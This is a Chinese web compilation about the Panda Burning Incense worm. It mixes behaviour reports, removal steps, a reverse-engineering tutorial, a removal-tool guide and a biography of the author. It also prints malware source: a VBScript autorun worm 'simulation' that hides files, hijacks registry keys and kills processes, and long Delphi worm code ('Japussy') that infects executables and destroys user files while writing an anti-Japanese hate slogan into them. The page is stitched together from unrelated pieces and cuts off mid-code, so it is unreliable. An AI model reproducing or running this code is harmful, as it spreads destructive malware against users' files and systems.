熊猫烧香病毒源代码

熊猫烧香的传播方式和源代码推荐文章庆祝建党95周年诗歌朗诵词热度：中国茶文化传播历程热度：中国茶文化的传播历程热度：马克思主义传播中国的转换模式热度：除夕可不可以去寺庙上香热度：熊猫烧香的传播方式和源代码是什么呢!下面由店铺为您提供熊猫烧香的传播方式和源代码，希望能帮助您。

熊猫烧香的传播方式和源代码：这是一个感染型的蠕虫病毒，它能感染系统中exe,com,pif,src,html,asp等文件，它还能中止大量的反病毒软件进程1拷贝文件病毒运行后，会把自己拷贝到C:\WINDOWS\System32\Drivers\spoclsv.exe2添加注册表自启动病毒会添加自启动项svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe3病毒行为a：每隔1秒寻找桌面窗口，并关闭窗口标题中含有以下字符的程序QQKavQQAV防火墙进程VirusScan网镖杀毒毒霸瑞星江民黄山IE超级兔子优化大师木马克星木马清道夫QQ病毒注册表编辑器系统配置实用程序卡巴斯基反病毒Symantec AntiVirusDuba熊猫烧香esteem proces绿鹰PC密码防盗噬菌体木马辅助查找器System Safety MonitorWrapped gift KillerWinsock Expert游戏木马检测大师msctls_statusbar32pjf(ustc)IceSword并使用的键盘映射的方法关闭安全软件IceSword添加注册表使自己自启动HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Runsvcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe并中止系统中以下的进程：Mcshield.exeVsTskMgr.exenaPrdMgr.exeUpdaterUI.exeTBMon.exescan32.exeRavmond.exeCCenter.exeRavTask.exeRav.exeRavmon.exeRavmonD.exeRavStub.exe熊猫烧香KVXP.kxpkvMonXP.kxpKVCenter.kxpKVSrvXP.exeKRegEx.exeUIHost.exeTrojDie.kxpFrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exeb：每隔18秒点击病毒作者指定的网页，并用命令行检查系统中是否存在共享共享存在的话就运行net share命令关闭admin$共享c：每隔10秒下载病毒作者指定的文件，并用命令行检查系统中是否存在共享共享存在的话就运行net share命令关闭admin$共享d：每隔6秒删除安全软件在注册表中的键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\RunRavTaskKvMonXPkavKAVPersonal50McAfeeUpdaterUINetwork Associates Error Reporting ServiceShStartEXEYLive.exeyassistse并修改以下值不显示隐藏文件HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00删除以下服务：navapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantec Core LCNPFMntorMskServiceFireSvce：感染文件病毒会感染扩展名为exe,pif,com,src的文件，把自己附加到文件的头部并在扩展名为htm,html,asp,php,jsp,aspx的文件中添加一网址，用户一但打开了该文件，IE就会不断的在后台点击写入的网址，达到增加点击量的目的，但病毒不会感染以下文件夹名中的文件：熊猫烧香WINDOWWinntSystem Volume InformationRecycledWindows NTWindowsUpdateWindows Media PlayerOutlook ExpressInternet ExplorerNetMeetingCommon FilesComPlus ApplicationsMessengerInstallShield Installation InformationMSNMicrosoft FrontpageMovie MakerMSN Gamin Zoneg：删除文件病毒会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失.瑞星病毒分析报告：“Nimaya(熊猫烧香)”这是一个传染型的DownLoad 使用Delphi编写。

病毒大小：22,886 字节加壳方式：UPack样本MD5：9749216a37d57cf4b2e528c027252062样本SHA1：5d3222d8ab6fc11f899eff32c2c8d3cd50cbd755发现时间：2006.11更新时间：2006.11关联病毒：传播方式：通过恶意网页传播，其它木马下载，可通过局域网、移动存储设备等传播技术分析==========又是“熊猫烧香”FuckJacks.exe的变种，和之前的变种一样使用白底熊猫烧香图标，病毒运行后复制自身到系统目录下：%System%\drivers\spoclsv.exe创建启动项：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "svcshare"="%System%\drivers\spoclsv.exe"修改注册表信息干扰“显示所有文件和文件夹”设置：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanc ed\Folder\Hidden\SHOW ALL]"CheckedValue"=dword:00000000在各分区根目录生成副本：X:\setup.exeX:\autorun.infautorun.inf内容：[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell\Auto\command=setup.exe尝试关闭下列窗口：QQKavQQA VVirusScanSymantec AntiVirusDubaWindowsesteem procsSystem Safety Monitor Wrapped gift Killer Winsock Expert msctls_statusbar32pjf(ustc)IceSword结束一些对头的进程：Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exescan32.exe Ravmond.exe CCenter.exe RavTask.exeRav.exeRavmon.exe RavmonD.exe RavStub.exeKVXP.kxp KvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exeTrojDie.kxp FrogAgent.exeLogo1_.exeLogo_1.exeRundl132.exe禁用一系列服务：Schedule sharedaccess RsCCenter RsRavMon RsCCenter RsRavMonKVWSCKVSrvXPkavsvcA VPMcAfeeFrameworkMcShieldMcTaskManagernavapsvcwscsvcKPfwSvcSNDSrvcccProxyccEvtMgrccSetMgrSPBBCSvcSymantec Core LCNPFMntorMskServiceFireSvc删除若干安全软件启动项信息：RavTaskKvMonXPkavKA VPersonal50McAfeeUpdaterUINetwork Associates Error Reporting ServiceShStatEXEYLive.exeyassistse使用net share命令删除管理共享：net share X$ /del /ynet share admin$ /del /ynet share IPC$ /del /y遍历目录，感染除以下系统目录外其它目录中的exe、com、scr、pif文件：X:\WINDOWSX:\WinntX:\System Volume InformationX:\Recycled%ProgramFiles%\Windows NT%ProgramFiles%\WindowsUpdate%ProgramFiles%\Windows Media Player%ProgramFiles%\Outlook Express%ProgramFiles%\Internet Explorer%ProgramFiles%\NetMeeting%ProgramFiles%\Common Files%ProgramFiles%\ComPlus Applications%ProgramFiles%\Messenger%ProgramFiles%\InstallShield Installation Information%ProgramFiles%\MSN%ProgramFiles%\Microsoft Frontpage%ProgramFiles%\Movie Maker%ProgramFiles%\MSN Gamin Zone将自身捆绑在被感染文件前端，并在尾部添加标记信息：.WhBoy{原文件名}.exe.{原文件大小}.与之前变种不同的是，这个病毒体虽然是22886字节，但是捆绑在文件前段的只有22838字节，被感染文件运行后会出错，而不会像之前变种那样释放出{原文件名}.exe的原始正常文件。

一、前言对病毒进行逆向分析，可以彻底弄清楚病毒的行为，从而采取更有效的针对手段。

为了节省篇幅，在这里我不打算将“熊猫烧香”进行彻底的分析，只会讲解一些比较重要的部分，大家只要掌握了这些思想，那么就可以处理很多的恶意程序了。

一般来说，对病毒的静态分析，我们采用的工具是IDA Pro，动态分析则采用OllyDbg。

由于后者会使病毒实际运行起来，所以为了安全起见，最好在虚拟机中操作。

另外，在实际分析过程中，我们可能还需要一些辅助工具，比如侦壳或脱壳程序等。

为了简单起见，这次研究的“熊猫烧香”程序并没有加壳，但是以后我们会讨论如何应对加壳或采用了其它保护手段的病毒。

二、查壳操作逆向分析的第一步就是用查壳工具对目标程序进行查壳操作。

这里我使用PEiD v0.95，检测结果如下：图1 对“熊猫烧香”进行查壳操作可见，本程序并没有加壳，那么就不涉及脱壳操作，并且是由Borland Delphi 6.0-7.0编写的。

由Delphi所编写的代码与VC++所编写的代码有所不同，最明显的两点区别如下：1、函数调用时参数的传递不完全用栈，而是主要用寄存器，即Delphi编译器默认以register方式传递函数参数。

这一点与VC编译的程序完全不同。

Delphi一般将第一个参数放入eax寄存器，第二个参数放入edx，第三个参数放入ecx寄存器，其余参数按照与VC程序类似的方式压栈。

2、栈上给局部变量分配空间的时候，栈是向下增长的，而栈上的数组、字符串、结构体等却是向上增长的。

理解这一点可以帮助识别栈上的变量。

对病毒样本进行了简单的侦测之后，就确定了分析的方向，那么接下来就需要使用反汇编工具进行分析了。

三、“熊猫烧香”的初步分析这里我使用IDA Pro载入病毒样本，首先可以看到如下代码：图2 “熊猫烧香”的入口代码上图所示的病毒程序起始处的反汇编代码是Delphi自行生成的，并不是我们所关心的病毒程序的功能代码，所以这里不对其进行讲解。

熊猫烧香病毒清除方法有哪些电脑病毒看不见，却无处不在，有时防护措施不够或者不当操作都会导致病毒入侵。

熊满烧香是之前很经典也是很可怕的一种病毒，那么具体有什么预防和处理办法呢?方法步骤1. 断开网络(必要)2. 结束病毒进程%System%\drivers\spoclsv.exe3. 删除病毒文件：c:\windows\system32\drivers\spoclsv.exe注意：打开C盘要右键-开打，否则仁兄就要功亏一篑，就要重复2的步骤!4. 修改注册表设置，恢复“显示所有文件和文件夹”选项功能：[Copy to clipboard]CODE:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C urrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]"CheckedValue"=dword:00000001本步骤针对病毒将显示隐藏文件禁用的情况5. 右键点击分区盘符，点击右键菜单中的“打开”进入分区根目录，删除根目录下的文件：X:\setup.exeX:\autorun.inf6. 删除病毒创建的启动项：[Copy to clipboard]CODE:[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe"7. 使用专杀工具进行全盘扫描，清除恢复被感染的exe文件推荐使用软件：NimayaKiller相关阅读：2018网络安全事件：一、英特尔处理器曝“Meltdown”和“Spectre漏洞”2018年1月，英特尔处理器中曝“Meltdown”(熔断)和“Spectre” (幽灵)两大新型漏洞，包括AMD、ARM、英特尔系统和处理器在内，几乎近20年发售的所有设备都受到影响，受影响的设备包括手机、电脑、服务器以及云计算产品。

熊猫烧香病毒之专杀工具的编写教程通过对熊猫烧香的行为分析，这里仅针对所得结果，来进行专杀工具的编写。

本节课我们会学习使用C++来写一个简单的“熊猫烧香”专杀系统。

实验目的：结合本篇文章的知识点，能够彻底掌握文章所讲述的编写杀毒软件的方法。

实验思路：1.理解专杀工具所需要实现的功能2.利用VC++编写专杀工具3.结合Process Monitor验证专杀工具实验步骤：1、病毒行为回顾与归纳这里我们首先回顾一下病毒的行为：**病毒行为1：**病毒本身创建了名为`spoclsv.exe`的进程，该进程文件的路径为：C:WINDOWSsystem32driversspoclsv.exe**病毒行为2：**在命令行模式下使用`net share`命令来取消系统中的共享。

**病毒行为3：**删除安全类软件在注册表中的启动项。

**病毒行为4：**在注册表:HKCUSoftwareMicrosoftWindowsCurrentVersionRun中创建svcshare用于在开机时启动位于`C:WINDOWSsystem32driversspoclsv.exe`的病毒程序。

**病毒行为5：**修改注册表，使得隐藏文件无法通过普通的设置进行显示，该位置为：HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL 病毒将`CheckedValue`的键值设置为了0。

**病毒行为6：**将自身拷贝到根目录，并命名为`setup.exe`，同时创建`autorun.inf`用于病毒的启动，这两个文件的属性都是“隐藏”。

**病毒行为7：**在一些目录中创建名为`Desktop_.ini`的隐藏文件。

**病毒行为8：**向外发包，连接局域网中其他机器。

纵观以上八点行为，这里需要说明的是，其中的第二点行为，由于我不知道用户计算机在中毒前的设置，因此这条我打算忽略。

VB也模拟熊猫烧香！使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术，切忌不要搞破坏，如果有人用本人代码破坏,后果自负'使用户不能通过双击打开硬盘，这里还可以修改为使其不能通过双击打开文件夹，同理，不赘续wsh.Regwrite"HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKCR\Drive\shell\","auto"wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'" wsh.Regwrite"HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"'修改默认文件图标这里可以换成可爱的熊猫哦wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico" wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeC aption","你好啊，开个小小的玩笑"wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeT ext","你已经中毒了!"'复制自身到C,D,E,F,U盘myfile.copy "c:\"myfile.copy "D:\"myfile.copy "E:\"myfile.copy "F:\"myfile.copy "I:\"myfile.attributes=34'定义Autorun.inf 的内容这个就是u盘病毒必须的代码部分这里可以简单写If fso.FileExists("C:\autorun.inf") ThenSet objFolder = fso.GetFile("C:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_&"&& echo open=NYboy.bat >>C:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_&"&& echo shell=Auto>>C:\autorun.inf"_&"&& attrib +h +s +r C:\autorun.inf" ,0set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)autobatc.writeline("NYboy.vbs")End IfIf fso.FileExists("D:\autorun.inf") ThenSet objFolder = fso.GetFile("D:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_&"&& echo open=NYboy.bat >>D:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_&"&& echo shell=Auto>>D:\autorun.inf"_&"&& attrib +h +s +r D:\autorun.inf" ,0set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)autobatd.writeline("NYboy.vbs")End IfIf fso.FileExists("E:\autorun.inf") ThenSet objFolder = fso.GetFile("E:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_&"&& echo open=NYboy.bat >>E:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_&"&& echo shell=Auto>>E:\autorun.inf"_&"&& attrib +h +s +r E:\autorun.inf" ,0set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)autobate.writeline("NYboy.vbs")End IfIf fso.FileExists("F:\autorun.inf") ThenSet objFolder = fso.GetFile("F:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_&"&& echo open=NYboy.bat >>F:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_&"&& echo shell=Auto>>F:\autorun.inf"_&"&& attrib +h +s +r F:\autorun.inf" ,0set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)autobatf.writeline("NYboy.vbs")End IfIf fso.FileExists("I:\autorun.inf") ThenSet objFolder = fso.GetFile("I:\autorun.inf")Elsewsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_&"&& echo open=NYboy.bat >>I:\autorun.inf"_&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_&"&& echo shell=Auto>>I:\autorun.inf"_&"&& attrib +h +s +r I:\autorun.inf" ,0set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)autobatf.writeline("NYboy.vbs")End If'设置病毒体属性为系统只读隐藏wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_&"&& attrib +h +s +r D:\NYboy.bat"_&"&& attrib +h +s +r E:\NYboy.bat"_&"&& attrib +h +s +r F:\NYboy.bat"_&"&& attrib +h +s +r I:\NYboy.bat"'强制结束某些进程,比如QQ，记事本，网页，批处理文件，卡巴，realplay等进程,运行后打不开这些文件doset ws=getobject("winmgmts:\\.\root\cimv2")set pp=ws.execquery("select * from win32_process wherename='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name ='winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")for each i in pp。

(一) 主程序段分析原“熊猫烧香”病毒“源码”主程序段代码如下所示：{==================主程序开始====================}beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 thenInfectFiles //感染和发邮件else //已寄生于宿主程序上了，开始工作beginTmpFile := ParamStr(0); //创建临时文件……....Line nDelete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, '.', Si, Pi); //创建新进程运行之……....Line n+7InfectFiles; //感染和发邮件end;end.对于代码：RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程虽然源码提供者省略了相应实现，但这是比较基本的编程实现。

通过把自身注册为服务进程，可以使自己随着系统的启动一起启动。

计算机病毒---熊猫烧香11教本一班孟奇110401041115社会背景熊猫烧香（英文名Worm.WhBoy.cw）是一种经过多次变种的“蠕虫病毒”变种，2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写，拥有感染传播功能，2007年1月初肆虐网络，它主要通过下载的档案传染，受到感染的机器文件因为被误携带间接对其它计算机程序、系统破坏严重。

计算机病毒（Computer Virus）是编制者在计算机程序中插入的破坏计算机功能或者数据的代码，能影响计算机使用，能自我复制的一组计算机指令或者程序代码。

计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。

计算机病毒的生命周期：开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。

计算机病毒是一个程序，一段可执行码。

就像生物病毒一样，具有自我繁殖、互相传染以及激活再生等生物病毒特征。

计算机病毒有独特的复制能力，它们能够快速蔓延，又常常难以根除。

它们能把自身附着在各种类型的文件上，当文件被复制或从一个用户传送到另一个用户时，它们就随同文件一起蔓延开来。

经济损失2006年爆发的“熊猫烧香”病毒给我国互联网行业造成了巨大恐慌，数百万台计算机受到影响，造成的经济损失难以估量。

据悉，多家著名网站已经遭到此类攻击，而相继被植入病毒。

由于这些网站的浏览量非常大，致使“熊猫烧香”病毒的感染范围非常广，中毒企业和政府机构已经超过千家，其中不乏金融、税务、能源等关系到国计民生的重要单位。

江苏等地区成为“熊猫烧香”重灾区。

至此，据不完全统计，仅2007年变种数已达90多个，个人用户感染熊猫烧香的已经高达几百万，企业用户感染数还在继续上升。

现象1.被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

，所以也被称为“熊猫烧香”病毒。

2.中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

3.病毒会删除扩展名为gho的文件，使用户无法使用ghost软件恢复操作系统。

熊猫烧香病毒介绍【基本信息】病毒名称:熊猫烧香，Worm.WhBoy.（金山称），Worm.Nimaya.（瑞星称）病毒别名：尼姆亚，武汉男生，后又化身为“金猪报喜”，国外称“熊猫烧香”危险级别：★★★★★病毒类型：蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程。

影响系统：Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista “熊猫烧香”的制造者熊猫烧香病毒的制造者-李俊一个水泥厂技校毕业的中专生，一个从未接受过专业训练的电脑爱好者，一个被杀毒软件公司拒之门外的年轻人，查毒了小半个中国互联网。

如果不是地震引发海底光缆故障，那只颔首敬香的“熊猫”，还将“迁徙”到更远的地方。

家人眼中的李俊：李俊的父母一直在家乡一水泥厂上班，几前年双双下岗，他妈妈做了个小推车在街上卖早点，他爸爸则到了一家私人瓦厂打工。

52岁的李俊妈妈陈女士说，李俊很小的时候就喜欢玩电脑，没事就到网吧去玩，因为怕他在外面学坏，家里就给他买了台电脑。

没想到到头来儿子却是因为“玩电脑”被警察抓走，陈女士感到悔恨不已。

李俊的父亲则说，四五岁时，李俊爱上了玩积木及拆卸家中的小机械，那时候，李俊将家中的收音机、闹钟、手电筒等凡是能拆开的物品，都拆成一个个零部件，歪着脑袋观察每个零部件后，又将零部件重新组装起来，恢复原样。

如果闹钟再次走动或收音机能发出声音时，李俊往往会拍手大笑，自顾自庆祝半天。

李俊的弟弟李明比他小三岁，西南民族大学音乐教育专业学生，今年放寒假回家，他偶尔和哥哥提起最近他和同学都中过的“熊猫烧香”电脑病毒。

哥哥听说后却一改以往的内向和谦卑，不屑一故地笑说：“这病毒没什么大不了。

”当时李明并没有想到，他的哥哥就是“熊猫烧香”的始作俑者。

李明告诉记者，哥哥在上学时数学和英语非常优秀，尽管如此，哥哥还是没能考上高中，而是进了水泥厂里自办的一所技校(现已改名为“娲石职业技术学校”)，后于2 000年到武汉一家电脑城打工后，自己有了收入，但他很少给家人钱花。

program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的大小IconOffset = $12EB8; //PE文件主图标的偏移量//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同//查找2800000020的十六进制字符串可以找到主图标的偏移量{HeaderSize = 38912; //Upx压缩过病毒体的大小IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量//Upx 1.24W 用法: upx -9 --8086 Japussy.exe}IconSize = $2E8; //PE文件主图标的大小--744字节IconTail = IconOffset + IconSize; //PE文件主图标的尾部ID = $44444444; //感染标记//垃圾码，以备写入Catchword = 'If a race need to be killed out, it must be Yamato. ' +'If a country need to be destroyed, it must be Japan! ' +'*** W32.Japussy.Worm.A ***';{$R *.RES}function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; //函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PROCESS_INFORMATION;IsJap: Boolean = False; //日文操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9xResult := True;end;{ 在流之间复制}procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCurPos, 0);end;{ 将宿主文件从已感染的PE文件中分离出来，以备使用}procedure ExtractFile(FileName: string);varsStream, dStream: TFileStream;begintrysStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);trydStream := TFileStream.Create(FileName, fmCreate);trysStream.Seek(HeaderSize, 0); //跳过头部的病毒部分dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;{ 填充STARTUPINFO结构}procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb := SizeOf(Si);Si.lpReserved := nil;Si.lpDesktop := nil;Si.lpTitle := nil;Si.dwFlags := STARTF_USESHOWWINDOW;Si.wShowWindow := State;Si.cbReserved2 := 0;Si.lpReserved2 := nil;end;{ 发带毒邮件}procedure SendMail;begin//哪位仁兄愿意完成之？end;{ 感染PE文件}procedure InfectOneFile(FileName: string);varHdrStream, SrcStream: TFileStream;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array[0..1] of Char;begintry //出错则文件正在被使用，退出if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染Exit;Infected := False;IsPE := False;SrcStream := TFileStream.Create(FileName, fmOpenRead);tryfor i := 0 to $108 do //检查PE文件头beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2);if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记beginIsPE := True; //是PE文件Break;end;end;SrcStream.Seek(-4, soFromEnd); //检查感染标记SrcStream.Read(iID, 4);if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染Infected := True;finallySrcStream.Free;end;if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出Exit;IcoStream := TMemoryStream.Create;DstStream := TMemoryStream.Create;tryaIcon := TIcon.Create;try//得到被感染文件的主图标(744字节)，存入流aIcon.ReleaseHandle;aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream := TFileStream.Create(FileName, fmOpenRead);//头文件HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);try//写入病毒体主图标之前的数据CopyStream(HdrStream, 0, DstStream, 0, IconOffset);//写入目前程序的主图标CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);//写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream, IconT ail, DstStream, IconT ail, HeaderSize - IconTail);//写入宿主程序CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);//写入已感染的标记DstStream.Seek(0, 2);iID := $44444444;DstStream.Write(iID, 4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName); //替换宿主文件DstStream.Free;end;except;end;end;{ 将目标文件写入垃圾码后删除}procedure SmashFile(FileName: string);varFileHandle: Integer;i, Size, Mass, Max, Len: Integer;begintrySetFileAttributes(PChar(FileName), 0); //去掉只读属性FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件trySize := GetFileSize(FileHandle, nil); //文件大小i := 0;Randomize;Max := Random(15); //写入垃圾码的随机次数if Max < 5 thenMax := 5;Mass := Size div Max; //每个间隔块的大小Len := Length(Catchword);while i < Max dobeginFileSeek(FileHandle, i * Mass, 0); //定位//写入垃圾码，将文件彻底破坏掉FileWrite(FileHandle, Catchword, Len);Inc(i);end;finallyFileClose(FileHandle); //关闭文件end;DeleteFile(PChar(FileName)); //删除之exceptend;end;{ 获得可写的驱动器列表}function GetDrives: string;varDiskType: Word;D: Char;Str: string;i: Integer;beginfor i := 0 to 25 do //遍历26个字母beginD := Chr(i + 65);Str := D + ':';DiskType := GetDriveType(PChar(Str));//得到本地磁盘和网络盘if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then Result := Result + D;end;end;{ 遍历目录，感染和摧毁文件}procedure LoopFiles(Path, Mask: string);vari, Count: Integer;Fn, Ext: string;SubDir: TStrings;SearchRec: TSearchRec;Msg: TMsg;function IsValidDir(SearchRec: TSearchRec): Integer;beginif (SearchRec.Attr <> 16) and ( <> '.') and( <> '..') thenResult := 0 //不是目录else if (SearchRec.Attr = 16) and ( <> '.') and( <> '..') thenResult := 1 //不是根目录else Result := 2; //是根目录end;beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) thenbeginrepeatPeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑if IsValidDir(SearchRec) = 0 thenbeginFn := Path + ;Ext := UpperCase(ExtractFileExt(Fn));if (Ext = '.EXE') or (Ext = '.SCR') thenbeginInfectOneFile(Fn); //感染可执行文件endelse if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') thenbegin//感染HTML和ASP文件，将Base64编码后的病毒写入//感染浏览此网页的所有用户//哪位大兄弟愿意完成之？endelse if Ext = '.WAB' then //Outlook地址簿文件begin//获取Outlook邮件地址endelse if Ext = '.ADC' then //Foxmail地址自动完成文件begin//获取Foxmail邮件地址endelse if Ext = 'IND' then //Foxmail地址簿文件begin//获取Foxmail邮件地址endelsebeginif IsJap then //是倭文操作系统beginif (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') thenSmashFile(Fn); //摧毁文件end;end;end;//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑Sleep(200);until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);SubDir := TStringList.Create;if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) thenbeginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add();until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);Count := SubDir.Count - 1;for i := 0 to Count 